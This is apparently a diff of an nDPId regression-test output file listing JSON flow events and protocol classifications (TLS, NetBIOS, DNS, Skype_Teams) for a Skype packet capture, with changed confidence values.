00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642417,"flow_last_seen":1431970643676,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970642414,"flow_last_seen":1431970643673,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 